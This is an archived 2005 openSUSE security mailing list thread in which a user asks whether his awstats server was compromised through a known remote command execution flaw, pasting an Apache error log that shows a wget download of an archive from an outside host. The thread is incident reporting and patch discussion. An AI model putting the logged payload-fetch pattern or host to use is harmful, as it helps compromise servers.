Mailinglist Archive: opensuse-security (256 mails)
| < Previous | Next > |
Re: [suse-security] Re: awstats remote command execution vulerability
- From: Markus Gerke <gerke@xxxxxxxxxxxxxxxxxxx>
- Date: Thu, 24 Feb 2005 10:16:33 +0100
- Message-id: <421D9B71.7010003@xxxxxxxxxxxxxxxxxxx>
Hi,
I installed awstats myself and therefore did not recognize that it is vulnerable (via the YOU run).
I'm afraid this night someone exploited this vulnerability.
I found this log in my error_log
...
[Thu Feb 24 02:00:44 2005] [error] [client 213.186.57.179] script not found or unable to stat: /usr/local/httpd/cgi-bin/awstats.pl
sh: line 1: /awstats.ipi207.ipi.uni-hannover.de.conf: No such file or directory
--02:05:09-- http://sm3naru.net/n.tgz
=> `n.tgz'
Resolving sm3naru.net... done.
Connecting to sm3naru.net[217.160.226.79]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 83,851 [text/plain]
0K .......... .......... .......... .......... .......... 61% 134.77 KB/s
50K .......... .......... .......... . 100% 10.38 MB/s
02:05:09 (218.95 KB/s) - `n.tgz' saved [83851/83851]
...
n.tgz contains some icq-server scripts
Can someone confirm that this is a exploitation of the awstats-error??? Why it is logged in the apache error-log?
Thanks,
Markus
Thomas Biege wrote:
I installed awstats myself and therefore did not recognize that it is vulnerable (via the YOU run).
I'm afraid this night someone exploited this vulnerability.
I found this log in my error_log
...
[Thu Feb 24 02:00:44 2005] [error] [client 213.186.57.179] script not found or unable to stat: /usr/local/httpd/cgi-bin/awstats.pl
sh: line 1: /awstats.ipi207.ipi.uni-hannover.de.conf: No such file or directory
--02:05:09-- http://sm3naru.net/n.tgz
=> `n.tgz'
Resolving sm3naru.net... done.
Connecting to sm3naru.net[217.160.226.79]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 83,851 [text/plain]
0K .......... .......... .......... .......... .......... 61% 134.77 KB/s
50K .......... .......... .......... . 100% 10.38 MB/s
02:05:09 (218.95 KB/s) - `n.tgz' saved [83851/83851]
...
n.tgz contains some icq-server scripts
Can someone confirm that this is a exploitation of the awstats-error??? Why it is logged in the apache error-log?
Thanks,
Markus
Thomas Biege wrote:
On Tue, Feb 08, 2005 at 11:29:50AM -0800, Dimitar Slavov wrote:
Hello:
Hello.
Is there any patch released for the awstats remote command execution vulerability from Jan 17th?
More info here:
http://lists.netsys.com/pipermail/full-disclosure/2005-January/031002.html
New packages were released jan 25.
please use YOU or check our web site.
| < Previous | Next > |